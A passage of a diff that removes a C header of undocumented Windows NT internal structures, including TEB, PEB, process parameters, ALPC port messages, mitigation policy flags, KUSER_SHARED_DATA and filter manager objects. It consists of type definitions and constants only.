- DWORD ArbitraryUserPointer;
- DWORD Self;
-} NT_TIB32, *PNT_TIB32;
-
-typedef struct _NT_TIB64 {
- DWORD64 ExceptionList;
- DWORD64 StackBase;
- DWORD64 StackLimit;
- DWORD64 SubSystemTib;
- union {
- DWORD64 FiberData;
- DWORD Version;
- };
- DWORD64 ArbitraryUserPointer;
- DWORD64 Self;
-} NT_TIB64, *PNT_TIB64;
-#endif
-
-typedef struct _TEB32 {
- NT_TIB32 NtTib;
-
- WOW64_POINTER(PVOID) EnvironmentPointer;
- CLIENT_ID32 ClientId;
- WOW64_POINTER(PVOID) ActiveRpcHandle;
- WOW64_POINTER(PVOID) ThreadLocalStoragePointer;
- WOW64_POINTER(PPEB) ProcessEnvironmentBlock;
-
- ULONG LastErrorValue;
- ULONG CountOfOwnedCriticalSections;
- WOW64_POINTER(PVOID) CsrClientThread;
- WOW64_POINTER(PVOID) Win32ThreadInfo;
- ULONG User32Reserved[26];
- ULONG UserReserved[5];
- WOW64_POINTER(PVOID) WOW32Reserved;
- LCID CurrentLocale;
- ULONG FpSoftwareStatusRegister;
- WOW64_POINTER(PVOID) SystemReserved1[54];
- NTSTATUS ExceptionCode;
- WOW64_POINTER(PVOID) ActivationContextStackPointer;
- BYTE SpareBytes[36];
- ULONG TxFsContext;
-
- GDI_TEB_BATCH32 GdiTebBatch;
- CLIENT_ID32 RealClientId;
- WOW64_POINTER(HANDLE) GdiCachedProcessHandle;
- ULONG GdiClientPID;
- ULONG GdiClientTID;
- WOW64_POINTER(PVOID) GdiThreadLocalInfo;
- WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62];
- WOW64_POINTER(PVOID) glDispatchTable[233];
- WOW64_POINTER(ULONG_PTR) glReserved1[29];
- WOW64_POINTER(PVOID) glReserved2;
- WOW64_POINTER(PVOID) glSectionInfo;
- WOW64_POINTER(PVOID) glSection;
- WOW64_POINTER(PVOID) glTable;
- WOW64_POINTER(PVOID) glCurrentRC;
- WOW64_POINTER(PVOID) glContext;
-
- NTSTATUS LastStatusValue;
- UNICODE_STRING32 StaticUnicodeString;
- WCHAR StaticUnicodeBuffer[261];
-
- WOW64_POINTER(PVOID) DeallocationStack;
- WOW64_POINTER(PVOID) TlsSlots[64];
- LIST_ENTRY32 TlsLinks;
-} TEB32, *PTEB32;
-
-typedef struct _PEB_LDR_DATA {
- ULONG Length;
- BOOLEAN Initialized;
- HANDLE SsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID EntryInProgress;
- BOOLEAN ShutdownInProgress;
- HANDLE ShutdownThreadId;
-} PEB_LDR_DATA, *PPEB_LDR_DATA;
-
-typedef struct _GDI_HANDLE_ENTRY {
- union
- {
- PVOID Object;
- PVOID NextFree;
- };
- union
- {
- struct
- {
- USHORT ProcessId;
- USHORT Lock : 1;
- USHORT Count : 15;
- };
- ULONG Value;
- } Owner;
- USHORT Unique;
- UCHAR Type;
- UCHAR Flags;
- PVOID UserPointer;
-} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY;
-
-typedef struct _GDI_SHARED_MEMORY {
- GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];
-} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;
-
-#define FLS_MAXIMUM_AVAILABLE 128
-#define TLS_MINIMUM_AVAILABLE 64
-#define TLS_EXPANSION_SLOTS 1024
-
-#define DOS_MAX_COMPONENT_LENGTH 255
-#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
-
-typedef struct _CURDIR {
- UNICODE_STRING DosPath;
- HANDLE Handle;
-} CURDIR, *PCURDIR;
-
-#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002
-#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003
-
-typedef struct _RTL_DRIVE_LETTER_CURDIR {
- USHORT Flags;
- USHORT Length;
- ULONG TimeStamp;
- STRING DosPath;
-} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
-
-typedef struct _RTL_USER_PROCESS_PARAMETERS {
- ULONG MaximumLength;
- ULONG Length;
-
- ULONG Flags;
- ULONG DebugFlags;
-
- HANDLE ConsoleHandle;
- ULONG ConsoleFlags;
- HANDLE StandardInput;
- HANDLE StandardOutput;
- HANDLE StandardError;
-
- CURDIR CurrentDirectory;
- UNICODE_STRING DllPath;
- UNICODE_STRING ImagePathName;
- UNICODE_STRING CommandLine;
- PVOID Environment;
-
- ULONG StartingX;
- ULONG StartingY;
- ULONG CountX;
- ULONG CountY;
- ULONG CountCharsX;
- ULONG CountCharsY;
- ULONG FillAttribute;
-
- ULONG WindowFlags;
- ULONG ShowWindowFlags;
- UNICODE_STRING WindowTitle;
- UNICODE_STRING DesktopInfo;
- UNICODE_STRING ShellInfo;
- UNICODE_STRING RuntimeData;
- RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
-
- ULONG EnvironmentSize;
- ULONG EnvironmentVersion;
- PVOID PackageDependencyData; //8+
- ULONG ProcessGroupId;
- // ULONG LoaderThreads;
-} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
-
-typedef struct _PEB {
- BOOLEAN InheritedAddressSpace;
- BOOLEAN ReadImageFileExecOptions;
- BOOLEAN BeingDebugged;
- union
- {
- BOOLEAN BitField;
- struct
- {
- BOOLEAN ImageUsesLargePages : 1;
- BOOLEAN IsProtectedProcess : 1;
- BOOLEAN IsImageDynamicallyRelocated : 1;
- BOOLEAN SkipPatchingUser32Forwarders : 1;
- BOOLEAN IsPackagedProcess : 1;
- BOOLEAN IsAppContainer : 1;
- BOOLEAN IsProtectedProcessLight : 1;
- BOOLEAN IsLongPathAwareProcess : 1;
- };
- };
- HANDLE Mutant;
-
- PVOID ImageBaseAddress;
- PPEB_LDR_DATA Ldr;
- PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
- PVOID SubSystemData;
- PVOID ProcessHeap;
- PRTL_CRITICAL_SECTION FastPebLock;
- PVOID AtlThunkSListPtr;
- PVOID IFEOKey;
- union
- {
- ULONG CrossProcessFlags;
- struct
- {
- ULONG ProcessInJob : 1;
- ULONG ProcessInitializing : 1;
- ULONG ProcessUsingVEH : 1;
- ULONG ProcessUsingVCH : 1;
- ULONG ProcessUsingFTH : 1;
- ULONG ProcessPreviouslyThrottled : 1;
- ULONG ProcessCurrentlyThrottled : 1;
- ULONG ProcessImagesHotPatched : 1;
- ULONG ReservedBits0 : 24;
- };
- ULONG EnvironmentUpdateCount;
- };
- union
- {
- PVOID KernelCallbackTable;
- PVOID UserSharedInfoPtr;
- };
- ULONG SystemReserved[1];
- ULONG AtlThunkSListPtr32;
- PVOID ApiSetMap;
- ULONG TlsExpansionCounter;
- PVOID TlsBitmap;
- ULONG TlsBitmapBits[2];
- PVOID ReadOnlySharedMemoryBase;
- PVOID HotpatchInformation;
- PVOID *ReadOnlyStaticServerData;
- PVOID AnsiCodePageData;
- PVOID OemCodePageData;
- PVOID UnicodeCaseTableData;
-
- ULONG NumberOfProcessors;
- ULONG NtGlobalFlag;
-
- LARGE_INTEGER CriticalSectionTimeout;
- SIZE_T HeapSegmentReserve;
- SIZE_T HeapSegmentCommit;
- SIZE_T HeapDeCommitTotalFreeThreshold;
- SIZE_T HeapDeCommitFreeBlockThreshold;
-
- ULONG NumberOfHeaps;
- ULONG MaximumNumberOfHeaps;
- PVOID *ProcessHeaps;
-
- PVOID GdiSharedHandleTable;
- PVOID ProcessStarterHelper;
- ULONG GdiDCAttributeList;
-
- PRTL_CRITICAL_SECTION LoaderLock;
-
- ULONG OSMajorVersion;
- ULONG OSMinorVersion;
- USHORT OSBuildNumber;
- USHORT OSCSDVersion;
- ULONG OSPlatformId;
- ULONG ImageSubsystem;
- ULONG ImageSubsystemMajorVersion;
- ULONG ImageSubsystemMinorVersion;
- ULONG_PTR ImageProcessAffinityMask;
- GDI_HANDLE_BUFFER GdiHandleBuffer;
- PVOID PostProcessInitRoutine;
-
- PVOID TlsExpansionBitmap;
- ULONG TlsExpansionBitmapBits[32];
-
- ULONG SessionId;
-
- ULARGE_INTEGER AppCompatFlags;
- ULARGE_INTEGER AppCompatFlagsUser;
- PVOID pShimData;
- PVOID AppCompatInfo;
-
- UNICODE_STRING CSDVersion;
-
- PVOID ActivationContextData;
- PVOID ProcessAssemblyStorageMap;
- PVOID SystemDefaultActivationContextData;
- PVOID SystemAssemblyStorageMap;
-
- SIZE_T MinimumStackCommit;
-
- PVOID *FlsCallback;
- LIST_ENTRY FlsListHead;
- PVOID FlsBitmap;
- ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
- ULONG FlsHighIndex;
-
- PVOID WerRegistrationData;
- PVOID WerShipAssertPtr;
- PVOID pContextData;
- PVOID pImageHeaderHash;
- union
- {
- ULONG TracingFlags;
- struct
- {
- ULONG HeapTracingEnabled : 1;
- ULONG CritSecTracingEnabled : 1;
- ULONG LibLoaderTracingEnabled : 1;
- ULONG SpareTracingBits : 29;
- };
- };
- ULONGLONG CsrServerReadOnlySharedMemoryBase;
-} PEB, *PPEB;
-
-typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
- ULONG Flags;
- PSTR FrameName;
-} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
-
-typedef struct _TEB_ACTIVE_FRAME {
- ULONG Flags;
- struct _TEB_ACTIVE_FRAME *Previous;
- PTEB_ACTIVE_FRAME_CONTEXT Context;
-} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
-
-#define GDI_BATCH_BUFFER_SIZE 310
-
-typedef struct _GDI_TEB_BATCH {
- ULONG Offset;
- UCHAR Alignment[4];
- ULONG_PTR HDC;
- ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
-} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
-
-typedef struct _TEB {
- NT_TIB NtTib;
-
- PVOID EnvironmentPointer;
- CLIENT_ID ClientId;
- PVOID ActiveRpcHandle;
- PVOID ThreadLocalStoragePointer;
- PPEB ProcessEnvironmentBlock;
-
- ULONG LastErrorValue;
- ULONG CountOfOwnedCriticalSections;
- PVOID CsrClientThread;
- PVOID Win32ThreadInfo;
- ULONG User32Reserved[26];
- ULONG UserReserved[5];
- PVOID WOW32Reserved;
- LCID CurrentLocale;
- ULONG FpSoftwareStatusRegister;
- PVOID SystemReserved1[54];
- NTSTATUS ExceptionCode;
- PVOID ActivationContextStackPointer;
-#if defined(_M_X64)
- UCHAR SpareBytes[24];
-#else
- UCHAR SpareBytes[36];
-#endif
- ULONG TxFsContext;
-
- GDI_TEB_BATCH GdiTebBatch;
- CLIENT_ID RealClientId;
- HANDLE GdiCachedProcessHandle;
- ULONG GdiClientPID;
- ULONG GdiClientTID;
- PVOID GdiThreadLocalInfo;
- ULONG_PTR Win32ClientInfo[62];
- PVOID glDispatchTable[233];
- ULONG_PTR glReserved1[29];
- PVOID glReserved2;
- PVOID glSectionInfo;
- PVOID glSection;
- PVOID glTable;
- PVOID glCurrentRC;
- PVOID glContext;
-
- NTSTATUS LastStatusValue;
- UNICODE_STRING StaticUnicodeString;
- WCHAR StaticUnicodeBuffer[261];
-
- PVOID DeallocationStack;
- PVOID TlsSlots[64];
- LIST_ENTRY TlsLinks;
-
- PVOID Vdm;
- PVOID ReservedForNtRpc;
- PVOID DbgSsReserved[2];
-
- ULONG HardErrorMode;
-#if defined(_M_X64)
- PVOID Instrumentation[11];
-#else
- PVOID Instrumentation[9];
-#endif
- GUID ActivityId;
-
- PVOID SubProcessTag;
- PVOID EtwLocalData;
- PVOID EtwTraceData;
- PVOID WinSockData;
- ULONG GdiBatchCount;
-
- union
- {
- PROCESSOR_NUMBER CurrentIdealProcessor;
- ULONG IdealProcessorValue;
- struct
- {
- UCHAR ReservedPad0;
- UCHAR ReservedPad1;
- UCHAR ReservedPad2;
- UCHAR IdealProcessor;
- };
- };
-
- ULONG GuaranteedStackBytes;
- PVOID ReservedForPerf;
- PVOID ReservedForOle;
- ULONG WaitingOnLoaderLock;
- PVOID SavedPriorityState;
- ULONG_PTR SoftPatchPtr1;
- PVOID ThreadPoolData;
- PVOID *TlsExpansionSlots;
-#if defined(_M_X64)
- PVOID DeallocationBStore;
- PVOID BStoreLimit;
-#endif
- ULONG MuiGeneration;
- ULONG IsImpersonating;
- PVOID NlsCache;
- PVOID pShimData;
- ULONG HeapVirtualAffinity;
- HANDLE CurrentTransactionHandle;
- PTEB_ACTIVE_FRAME ActiveFrame;
- PVOID FlsData;
-
- PVOID PreferredLanguages;
- PVOID UserPrefLanguages;
- PVOID MergedPrefLanguages;
- ULONG MuiImpersonation;
-
- union
- {
- USHORT CrossTebFlags;
- USHORT SpareCrossTebBits : 16;
- };
- union
- {
- USHORT SameTebFlags;
- struct
- {
- USHORT SafeThunkCall : 1;
- USHORT InDebugPrint : 1;
- USHORT HasFiberData : 1;
- USHORT SkipThreadAttach : 1;
- USHORT WerInShipAssertCode : 1;
- USHORT RanProcessInit : 1;
- USHORT ClonedThread : 1;
- USHORT SuppressDebugMsg : 1;
- USHORT DisableUserStackWalk : 1;
- USHORT RtlExceptionAttached : 1;
- USHORT InitialThread : 1;
- USHORT SpareSameTebBits : 1;
- };
- };
-
- PVOID TxnScopeEnterCallback;
- PVOID TxnScopeExitCallback;
- PVOID TxnScopeContext;
- ULONG LockCount;
- ULONG SpareUlong0;
- PVOID ResourceRetValue;
-} TEB, *PTEB;
-
-typedef struct _PROCESS_DEVICEMAP_INFORMATION {
- union {
- struct {
- HANDLE DirectoryHandle;
- } Set;
- struct {
- ULONG DriveMap;
- UCHAR DriveType[32];
- } Query;
- };
-} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION;
-
-__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
-
-/*
-** PEB/TEB END
-*/
-
-/*
-** ALPC START
-*/
-
-typedef struct _PORT_MESSAGE {
- union {
- struct {
- CSHORT DataLength;
- CSHORT TotalLength;
- } s1;
- ULONG Length;
- } u1;
- union {
- struct {
- CSHORT Type;
- CSHORT DataInfoOffset;
- } s2;
- ULONG ZeroInit;
- } u2;
- union {
- CLIENT_ID ClientId;
- double DoNotUseThisField; // Force quadword alignment
- } u3;
- ULONG MessageId;
- union {
- ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
- ULONG CallbackId; // Only valid on LPC_REQUEST message
- } u4;
- UCHAR Reserved[8];
-} PORT_MESSAGE, *PPORT_MESSAGE;
-
-// end_ntsrv
-
-typedef struct _PORT_DATA_ENTRY {
- PVOID Base;
- ULONG Size;
-} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
-
-typedef struct _PORT_DATA_INFORMATION {
- ULONG CountDataEntries;
- PORT_DATA_ENTRY DataEntries[1];
-} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
-
-#define LPC_REQUEST 1
-#define LPC_REPLY 2
-#define LPC_DATAGRAM 3
-#define LPC_LOST_REPLY 4
-#define LPC_PORT_CLOSED 5
-#define LPC_CLIENT_DIED 6
-#define LPC_EXCEPTION 7
-#define LPC_DEBUG_EVENT 8
-#define LPC_ERROR_EVENT 9
-#define LPC_CONNECTION_REQUEST 10
-
-#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
-#define PORT_MAXIMUM_MESSAGE_LENGTH 256
-
-typedef struct _LPC_CLIENT_DIED_MSG {
- PORT_MESSAGE PortMsg;
- LARGE_INTEGER CreateTime;
-} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
-
-//#pragma pack(push, 1)
-typedef struct _PORT_VIEW {
- ULONG Length;
- HANDLE SectionHandle;
- ULONG SectionOffset;
- SIZE_T ViewSize;
- PVOID ViewBase;
- PVOID ViewRemoteBase;
-} PORT_VIEW, *PPORT_VIEW;
-
-typedef struct _REMOTE_PORT_VIEW {
- ULONG Length;
- SIZE_T ViewSize;
- PVOID ViewBase;
-} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
-//#pragma pack(pop)
-/*
-** ALPC END
-*/
-
-/*
-** MITIGATION POLICY START
-*/
-
-//redefine enum
-
-#define ProcessDEPPolicy 0
-#define ProcessASLRPolicy 1
-#define ProcessDynamicCodePolicy 2
-#define ProcessStrictHandleCheckPolicy 3
-#define ProcessSystemCallDisablePolicy 4
-#define ProcessMitigationOptionsMask 5
-#define ProcessExtensionPointDisablePolicy 6
-#define ProcessControlFlowGuardPolicy 7
-#define ProcessSignaturePolicy 8
-#define ProcessFontDisablePolicy 9
-#define ProcessImageLoadPolicy 10
-#define ProcessSystemCallFilterPolicy 11
-#define ProcessPayloadRestrictionPolicy 12
-#define ProcessChildProcessPolicy 13
-#define ProcessSideChannelIsolationPolicy 14
-
-typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {
- union {
- DWORD Flags;
- struct {
- DWORD MicrosoftSignedOnly : 1;
- DWORD StoreSignedOnly : 1;
- DWORD MitigationOptIn : 1;
- DWORD AuditMicrosoftSignedOnly : 1;
- DWORD AuditStoreSignedOnly : 1;
- DWORD ReservedFlags : 27;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 {
- union {
- DWORD Flags;
- struct {
- DWORD ProhibitDynamicCode : 1;
- DWORD AllowThreadOptOut : 1;
- DWORD AllowRemoteDowngrade : 1;
- DWORD AuditProhibitDynamicCode : 1;
- DWORD ReservedFlags : 28;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 {
- union {
- DWORD Flags;
- struct {
- DWORD EnableControlFlowGuard : 1;
- DWORD EnableExportSuppression : 1;
- DWORD StrictMode : 1;
- DWORD ReservedFlags : 29;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 {
- union {
- DWORD Flags;
- struct {
- DWORD DisableNonSystemFonts : 1;
- DWORD AuditNonSystemFontLoading : 1;
- DWORD ReservedFlags : 30;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 {
- union {
- DWORD Flags;
- struct {
- DWORD NoRemoteImages : 1;
- DWORD NoLowMandatoryLabelImages : 1;
- DWORD PreferSystem32Images : 1;
- DWORD AuditNoRemoteImages : 1;
- DWORD AuditNoLowMandatoryLabelImages : 1;
- DWORD ReservedFlags : 27;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, *PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 {
- union {
- ULONG Flags;
- struct {
- ULONG FilterId : 4;
- ULONG ReservedFlags : 28;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 {
- union {
- ULONG Flags;
- struct {
- ULONG EnableExportAddressFilter : 1;
- ULONG AuditExportAddressFilter : 1;
- ULONG EnableExportAddressFilterPlus : 1;
- ULONG AuditExportAddressFilterPlus : 1;
- ULONG EnableImportAddressFilter : 1;
- ULONG AuditImportAddressFilter : 1;
- ULONG EnableRopStackPivot : 1;
- ULONG AuditRopStackPivot : 1;
- ULONG EnableRopCallerCheck : 1;
- ULONG AuditRopCallerCheck : 1;
- ULONG EnableRopSimExec : 1;
- ULONG AuditRopSimExec : 1;
- ULONG ReservedFlags : 20;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10;
-
-typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
- union {
- ULONG Flags;
- struct {
- ULONG NoChildProcessCreation : 1;
- ULONG AuditNoChildProcessCreation : 1;
- ULONG AllowSecureProcessCreation : 1;
- ULONG ReservedFlags : 29;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;
-
-typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
- PROCESS_MITIGATION_POLICY Policy;
- union
- {
- PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;
- PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;
- PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy;
- PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;
- PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;
- PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;
- PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy;
- PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy;
- PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy;
- PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;
- PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;
- PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
- };
-} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;
-
-/*
-** MITIGATION POLICY END
-*/
-
-/*
-** KUSER_SHARED_DATA START
-*/
-#define NX_SUPPORT_POLICY_ALWAYSOFF 0
-#define NX_SUPPORT_POLICY_ALWAYSON 1
-#define NX_SUPPORT_POLICY_OPTIN 2
-#define NX_SUPPORT_POLICY_OPTOUT 3
-
-#include
-typedef struct _KSYSTEM_TIME {
- ULONG LowPart;
- LONG High1Time;
- LONG High2Time;
-} KSYSTEM_TIME, *PKSYSTEM_TIME;
-#include
-
-typedef enum _NT_PRODUCT_TYPE {
- NtProductWinNt = 1,
- NtProductLanManNt,
- NtProductServer
-} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;
-
-#define PROCESSOR_FEATURE_MAX 64
-
-typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {
- StandardDesign, // None == 0 == standard design
- NEC98x86, // NEC PC98xx series on X86
- EndAlternatives // past end of known alternatives
-} ALTERNATIVE_ARCHITECTURE_TYPE;
-
-//
-// Define Address of User Shared Data
-//
-#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000
-
-//
-// WARNING: this definition is OS version dependent.
-// Structure maybe incomplete.
-//
-#include
-typedef struct _KUSER_SHARED_DATA {
-
- ULONG TickCountLowDeprecated;
- ULONG TickCountMultiplier;
-
- volatile KSYSTEM_TIME InterruptTime;
- volatile KSYSTEM_TIME SystemTime;
- volatile KSYSTEM_TIME TimeZoneBias;
-
- USHORT ImageNumberLow;
- USHORT ImageNumberHigh;
-
- WCHAR NtSystemRoot[260];
-
- ULONG MaxStackTraceDepth;
- ULONG CryptoExponent;
- ULONG TimeZoneId;
- ULONG LargePageMinimum;
-
- union {
- ULONG Reserved2[7];
- struct {
- ULONG AitSamplingValue;
- ULONG AppCompatFlag;
- struct {
- ULONG LowPart;
- ULONG HighPart;
- } RNGSeedVersion;
- ULONG GlobalValidationRunlevel;
- LONG TimeZoneBiasStamp;
- ULONG NtBuildNumber;
- };
- };
-
- NT_PRODUCT_TYPE NtProductType;
- BOOLEAN ProductTypeIsValid;
- UCHAR Reserved0[1];
- USHORT NativeProcessorArchitecture;
-
- ULONG NtMajorVersion;
- ULONG NtMinorVersion;
-
- BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
- ULONG Reserved1;
- ULONG Reserved3;
- volatile ULONG TimeSlip;
- ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
- ULONG AltArchitecturePad;
- LARGE_INTEGER SystemExpirationDate;
- ULONG SuiteMask;
- BOOLEAN KdDebuggerEnabled;
-
- union {
- UCHAR MitigationPolicies;
- struct {
- UCHAR NXSupportPolicy : 2;
- UCHAR SEHValidationPolicy : 2;
- UCHAR CurDirDevicesSkippedForDlls : 2;
- UCHAR Reserved : 2;
- };
- };
-
- UCHAR Reserved6[2];
-
- volatile ULONG ActiveConsoleId;
- volatile ULONG DismountCount;
- ULONG ComPlusPackage;
- ULONG LastSystemRITEventTickCount;
- ULONG NumberOfPhysicalPages;
- BOOLEAN SafeBootMode;
- UCHAR VirtualizationFlags;
- UCHAR Reserved12[2];
-
- union {
- ULONG SharedDataFlags;
- struct {
- ULONG DbgErrorPortPresent : 1;
- ULONG DbgElevationEnabled : 1;
- ULONG DbgVirtEnabled : 1;
- ULONG DbgInstallerDetectEnabled : 1;
- ULONG DbgLkgEnabled : 1;
- ULONG DbgDynProcessorEnabled : 1;
- ULONG DbgConsoleBrokerEnabled : 1;
- ULONG DbgSecureBootEnabled : 1;
- ULONG DbgMultiSessionSku : 1;
- ULONG DbgMultiUsersInSessionSku : 1;
- ULONG DbgStateSeparationEnabled : 1;
- ULONG SpareBits : 21;
- };
- };
- ULONG DataFlagsPad[1];
- ULONGLONG TestRetInstruction;
- LONGLONG QpcFrequency;
-
- ULONG SystemCall;
- ULONG SystemCallPad0;
-
- ULONGLONG SystemCallPad[2];
-
- union {
- volatile KSYSTEM_TIME TickCount;
- volatile ULONG64 TickCountQuad;
- ULONG ReservedTickCountOverlay[3];
- };
-
- ULONG TickCountPad[1];
-
- ULONG Cookie;
- ULONG CookiedPad;
-
- ULONG ConsoleSessionForegroundProcessId;
-
- ULONGLONG TimeUpdateLock;
- ULONGLONG BaselineSystemTimeQpc;
- ULONGLONG BaselineInterruptTimeQpc;
- ULONGLONG QpcSystemTimeIncrement;
- ULONGLONG QpcInterruptTimeIncrement;
- UCHAR QpcSystemTimeIncrementShift;
- UCHAR QpcInterruptTimeIncrementShift;
- USHORT UnparkedProcessorCount;
-
- ULONG EnclaveFeatureMask[4];
- union {
- ULONG Reserved8;
- ULONG TelemetryCoverageRound;
- };
-
- USHORT UserModeGlobalLogger[16];
-
- ULONG ImageFileExecutionOptions;
- ULONG LangGenerationCount;
- ULONGLONG Reserved4;
-
- volatile ULONG64 InterruptTimeBias;
- volatile ULONG64 QpcBias;
-
- ULONG ActiveProcessorCount;
- volatile UCHAR ActiveGroupCount;
- UCHAR Reserved9;
-
- union {
- USHORT QpcData;
- struct {
- UCHAR QpcBypassEnabled : 1;
- UCHAR QpcShift : 1;
- };
- };
-
- LARGE_INTEGER TimeZoneBiasEffectiveStart;
- LARGE_INTEGER TimeZoneBiasEffectiveEnd;
-
- XSTATE_CONFIGURATION XState;
-
-} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
-#include
-
-#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)
-
-/*
-** KUSER_SHARED_DATA END
-*/
-
-/*
-** FLT MANAGER START
-*/
-
-#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1
-#define FLTFL_FILTERING_INITIATED 0x2
-#define FLTFL_NAME_PROVIDER 0x4
-#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8
-
-#define FLT_OBFL_DRAINING 0x1
-#define FLT_OBFL_ZOMBIED 0x2
-#define FLT_OBFL_TYPE_INSTANCE 0x1000000
-#define FLT_OBFL_TYPE_FILTER 0x2000000
-#define FLT_OBFL_TYPE_VOLUME 0x4000000
-
-typedef struct _FLT_OBJECT {
- ULONG Flags;
- ULONG PointerCount;
- EX_RUNDOWN_REF RundownRef;
- LIST_ENTRY PrimaryLink;
-} FLT_OBJECT, *PFLT_OBJECT;
-
-typedef struct _FLT_SERVER_PORT_OBJECT {
- LIST_ENTRY FilterLink;
- PVOID ConnectNotify;
- PVOID DisconnectNotify;
- PVOID MessageNotify;
- PVOID Filter;
- PVOID Cookie;
- ULONG Flags;
- ULONG NumberOfConnections;
- ULONG MaxConnections;
-} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT;
-
-/*
-** FLT MANAGER END
-*/
-
-/*
-** SILO START
-*/
-
-typedef struct _SYSTEM_ROOT_SILO_INFORMATION {
- ULONG NumberOfSilos;
- ULONG SiloIdList[1];
